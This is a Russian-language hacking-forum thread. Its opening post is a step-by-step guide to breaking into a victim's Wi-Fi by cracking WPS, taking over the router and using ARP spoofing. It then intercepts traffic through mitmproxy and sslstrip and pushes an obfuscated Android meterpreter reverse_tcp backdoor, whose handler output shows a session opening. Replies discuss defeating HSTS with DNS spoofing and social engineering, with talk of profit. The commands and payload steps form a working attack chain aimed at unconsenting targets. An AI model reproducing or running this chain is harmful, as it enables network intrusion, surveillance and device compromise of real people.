![]() |
Всем привет. Классній у вас форум. Я искал по теме много, но ничего подобного не нашел, по єтому сделал сам. Поделюсь и с вами.
единственное что я не буду расжевівать совсем єлементарніе вещи, типа как скачать oneshot с помощью git clone и так далее. Это должно біть на втоматизме у любого спеца по КБ. В общем что нам понадобится: oneshot.py - такой себе аналог всех вайфайтов, аиргеддонов, вайфайаутопвнеров, которій работает даже с нокии без режима монитора arpspoof - бинарная версия работает спуфера мак адресов работает куда стабильнее, чем аналоги bettercap2 (чисто для визуализации процесса, + очень удобній net.sniff сниффер) mitmproxy 6 dev - потужная штука. Используется в качестве анализатора траффика и, собственно говоря, прозрачного прокси. пару строчек кода на питоне, в качестве плагина для митмпрокси msfvenom -генератор нашего импланта msfconsole -хендлер нашего бекконекта obfuskapk - опенсоурсній криптер для APK 0) Код: Код:
ifconfig wlx00c0caa79483 down && macchanger -r wlx00c0caa79483Тут стоит отметить, что если ваша цель достаточно удалена от вас, а возможности подобраться ближе нету - то можно [S]выйти из машины и пройтись[/S] вспомнить что радиоволны имеют свойство отражаться от поверхности (особенно бетона) и "скользят" по водной поверхности. откріваем ноут, берем карту и направленную антену, направляем в окошко жертві и запускаем # ./oneshot.py -i wlx00c0caa79483 -K -F получаем список жертв, вібираем, получаем пароль. Как работает атака пиксель-даст можно прочесть в интернете. если ті на линуксе - # nano /etc/network/interfaces Код: Код:
auto wlx00c0caa79483Код:
service networking restartдалее, смотрим что мі в сетке # ifconfig Код: Код:
wlx00c0caa79483: flags=4163 mtu 15002) смотрим гейт: # route -n Код: Код:
Destination Gateway Genmask Flags Metric Ref Use IfaceЕсли там не admin:admin -> то гуглим что там и попадаем в роутер. если не нагуглили то пробуем так или брутим. Ещё можно пройтись nmap по гейту, и посмотреть, что на нём крутиться. Бывает так, что в одной сети несколько роутеров. А бывает так, что в роутере есть порт 22 к которому можно подключиться посредством telnet. Зачем? что бі вірубить client isolation и всякие сетевіе єкрані. вірубили, идем далее # nmap -sS -sV -T4 -O -Pn -T 5 192.168.0.0/24 Код: Код:
Nmap scan report for 192.168.0.103# net.sniff on; net.show ; Bash: Код:
┌───────────────┬───────────────────┬─────────────────┬───────────────────────────────┬───────┬───────┬──────────┐для єтого мі запустим mitmproxy. предварительно написав для него плагин redirect_requests.py Python: Код:
import# mitmproxy --mode transparent --rawtcp --ssl-insecure --listen-host 192.168.0.113 --server --listen-port 8080 --anticomp --showhost --anticache -s ../complex/sslstrip.py -s redirect_requests.py ничтяк. теперь нам нужно посмотреть все ли так как мі задумали и запустить arpspoof # arpspoof -i wlx00c0caa79483 -t 192.168.0.103 192.168.0.1 синтаксис понять не трудно. -t атакуемій, а после него без ключа гейт. то есть роутр. пошел спуфинг, и если все сделано правильно то ті увидишь как пакетики идут через наш прозрачній прокси. но. но ті єтого не увидишь, потому, что сперва нужно сделать форвардинг. а єто штука занятная и я с тобой поделюсь одной херней которая будет работать. для начала вірубай свой iptables, iptables_legaсy и так далее. они все уже deprecated и скоро работать перестанут. пора изучать nf_tables. так что вірубай arpspoof пока что! сперва создадим конфиг mitm.conf Bash: Код:
table#nft flush ruleset && nft -f /root/mitm.conf && nft list ruleset в ответ ті должен увидеть примерно то, что записал в файл. значения могут менятся динамично, єто нормально. Конечно же не забіваем включить форвардинг # sysctl net.ipv4.conf.all.forwarding=1 # sysctl net.ipv6.conf.all.forwarding=1 должно все работать, йоу) ах, да. еще один штрих. идем в bettercap2 и пишем help any.proxy Код: Код:
any.proxy (not running): A firewall redirection to any custom proxy.Код: Код:
192.168.0.0/24 > 192.168.0.113 » any.proxy on# arpspoof -i wlx00c0caa79483 -t 192.168.0.103 192.168.0.1 все получилось? пакеті пошли через нас? ничтячелло брателло. теперь время разобраться с пєйлоадом) откріваем на серва по ssh и пишем # msfvenom --platform android -a dalvik -p android/meterpreter/reverse_tcp LHOST=наш_ипи LPORT=4444 -o payload.apk Код: Код:
No encoder or badchars specified, outputting raw payloadпо этому мы заюзаем Obfuscapk # python3.7 -m obfuscapk.cli -p -w ~/Fatrat_Generated/obf/ -d ~/Fatrat_Generated/obf.apk -o ConstStringEncryption -o Nop -o Goto -o RandomManifest -o Rebuild -o NewSignature -o NewAlignment ~/Fatrat_Generated/app_backdoor.apk Код: Код:
Running obfuscators (NewAlignment): 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████|[01:01Код:
payload => android/meterpreter/reverse_tcp# handler -H 0.0.0.0 -P 4444 -n op6 -p android/meterpreter/reverse_tcp Код: Код:
[*] Payload handler running as background job 0.Код: Код:
[*] Sending stage (73560 bytes) to 79.110.129.176[*] Meterpreter session 1 opened (твой_ипи:4444 -> 79.110.129.176:25463) at 2020-01-06 11:14:42 +0300на связи https://forum.antichat.xyz/attachmen...775b220420.png |
Перенес в статьи.
На будущее можно добавить больше скриншотов и описаний (теории). |
Автор молодец! И понятно и юмор есть (не сухо расписал)
|
если ті на линуксе -
# nano /etc/network/interfaces Код: auto wlx00c0caa79483 allow-hotplug wlx00c0caa79483 iface wlx00c0caa79483 inet dhcp wpa-essid target_name wpa-psk target_passswd если ті не на линуксе - ставь линукс. в голос |
Есть среди нас ребята, кто шарит на питоне?
Есть такая софтина - PEINJECTOR. Очень крутой фреймворк, на лету внедряет имплант в передающийся PE файл. но вот из-за отсутствия поддержки не хочет нормально работать. Если быть точным - там используются куски mitmproxy 0.18. где ещё принципиально другие функции используются. И написан он (митмпрокси, а соответственно peinjector-interceptor) на питоне втором. Надо подправить под третий. Был бы очень-очень крутецеий тулсет. |
Красавчик, очень годно!
Вопрос по митмпрокси. Если я правил ьно понял, то когла жертва пойдет на гугл плей и начнет установку какой-нибудь игрули, то вместо игрули к ней залетит имплатн. Но ведь сейчас везде ssl, как митмпрокси влезает в ssl соединение? |
Очень понравилась статья, так держать.
|
Цитата:
Есть уязвимость в этих цифровых подписях - но версии 1.0. сейчас используется 2.0 Так вот, сам плеймаркет гонит траффик tcp/ip. И для того, что бы это все сработало - нужно либо ждать пока наш поциент скачает что-то через браузер, либо юзать СИ. Либо, как вариант, эксплуатировать распространенные уязвимости мобильных браузеров. Есть ещё варианты: Самый лучший, как по мне, это сделать что-то типа DNS спуфинга + sslstrip - которые сперва скажут что google.com на самом деле находятся по адресу 192.168.0.144, а потом скажут что google.com на самом деле отвечают и работают с портом 80 по протоколу http v1.0 Так вот, в этом случае, по идее, нам не помеха не HSTS не SSL. Вопрос в том, что Google Chrome , к примеру, если видит , в прямом смысле видит, на загруженной странице сайт гугл , но это не сервер гугл, то он стучит в гугл, и фишинг перестает работать. То есть, нам нужно куда более глубокого анализировать и оттачивать этот момент. На самом деле я мечтаю довести эту технику таргетированно проникновения до автоматизма без СИ |
Цитата:
Ваша статья в целом не плоха - но не могли бы вы воздержаться от употребления нецензурной брани и школьного сленга в её изложении? К сожалению, отправлена в песочницу для исправления. |
Я Вас услышал.
К сожалению, я не вижу опции редактирования поста. Как мне это исправить? |
Цитата:
|
Цитата:
|
Цитата:
Цитата:
В большинстве случаев атака закончится на этих этапах. WPS почти всегда сейчас имеет защиту от брута пина и банит на n-ное количество времени. Брут может длиться крайне долго. |
Цитата:
Есть ещё ряд эксплоитов под эти веб интерфейсы. Быть может мы нам намекнёте как поступать в таких случаях?) |
Бро, если есть опыт с sslstrip, расскажи подробнее он вообще актуален сейчас? я смотрел видос в ютубе там чел говорил что в bettercap 1 он работает норм, а в bettercap2 косячит и страницы не открываются. Это особенность беттеркапоской реализации или sslstrip как таковой умирает?
|
Цитата:
Раньше писали статьи поприколу ради респекта и е-зинов, теперь все вокруг пентестеры и этичные хакеры ), пришло время годного контента, за который платят. Но платить будут только за опрятный нетоксичный контент. Так что искренне желаю тебе безболезнено сменить стиль и заточиться по солидный формат) Юмор оставляй, это всегда хорошо, хотя зависит от редполитики издания. |
Цитата:
|
Цитата:
Мне понравилась методика mitmproxy - их плагины лежат в папке со скриптами самой программы, а документация есть на офф. ресурсе. Умирает-ли сама техника? Против нее существует технология HSTSкоторая, если грубо, отвергает запросы не через HTTPS. Однако, я думаю, что это можно обойти с помощью DNS спуфинга. Поднять на атакующем ПК зеркальный веб сервер, перехватить запрос клиента, потом отправить запрос клиента со своего пк, к примеру на google.com, получить ответ, и разместить его у себя на сервере. А потом выдать клиенту "зеркало" google.com с помощью http (на http его перенаправить посредством sslsplit). По идее должно работать. Вопрос только чем сделать такое зеркало? Кобальт такое умеет, но для одной страницы. Может есть умельцы кто под кобу напишет скрипт? |
Всё конечно хорошо и старо как мир,но думаю видео примеры на живых машинах смотрелось бы интересней для людей только начинающих осваивать это.
|
Цитата:
|
спасибо за статью, увлекся со старта прочтения )
|
Всем приветики. Если не трудно. Обьясните, что я неправильно делаю. Пробую запускать с KaliLinux...
root@kali:~# ifconfig wlan0 down && maccenger -r wlan0 bash: maccenger: command not found |
Цитата:
macchanger |
Спасибо...
|
Цитата:
|
Цитата:
Решение. sudo nano /etc/default/grub внести изменения в GRUB_CMDLINE_LINUX_DEFAULT="quiet" на GRUB_CMDLINE_LINUX_DEFAULT="net.iframes=0" сохраняем и обновляем загрузчик sudo grub-mkconfig -o /boot/grub/grub.cfg перезагружаемся и интерфейсы отображаются в стандартном виде. Опыт и копипаста с community.parrotlinux.org |
Норм)) с матом четче людям доходит! по себе знаю)
а так да, смотришь правильно, DNS spoof наше все! : dnscheff + wifi-pumpkin и не много СИ получится злая ..йня!)) |
Цитата:
Цитата:
все deprecated. как быть? я все возможные варианты переколупал. на программирование нету времени да и сил просто.... на счет СИ - та СИ то СИ. хотелось бы без СИ. Можжет какие-нибуть слабые алгоритмы пробрутфорсить? |
в эту сторону смотрел?
И обновляется вроде, регулярно... Screenshot Captured with Lightshot prnt.sc и BeEF тоже,начали поддерживать) |
Цитата:
Бииф надо будет изучить полюбому. А что касается видоса - так а толку? если у меня срабатывает sslstrip - то мне по сути-то и не нужно извращаться - я уже могу делать с траффиком цели что угодно. но sslstrip не срабатывает в случает с HSTS |
Народ, я это сделал!
Я не знаю как оно получилось, но оно работает! Во всяком случае один раз сработало. https://forum.antichat.xyz/attachmen...3307cc3bee.png @b0d ты это имел ввиду? |
|
Цитата:
|
Цитата:
если подробнее - надо писать статью. в этом комбайне бурп используется в качестве бэк-энд прокси. чисто для таких примочек как sslstrip+ |
ЖДУ!) очень интересно!
если будет работать, озолотимся) |
тоже жду, интересна реализация
|
Цитата:
|
молчание знакомо!) видно нашел то что нельзя в массы пускать, понимаю)
|
Цитата:
проект ждет именно тебя напиши мне в лс |
Цитата:
|
| Время: 23:30 |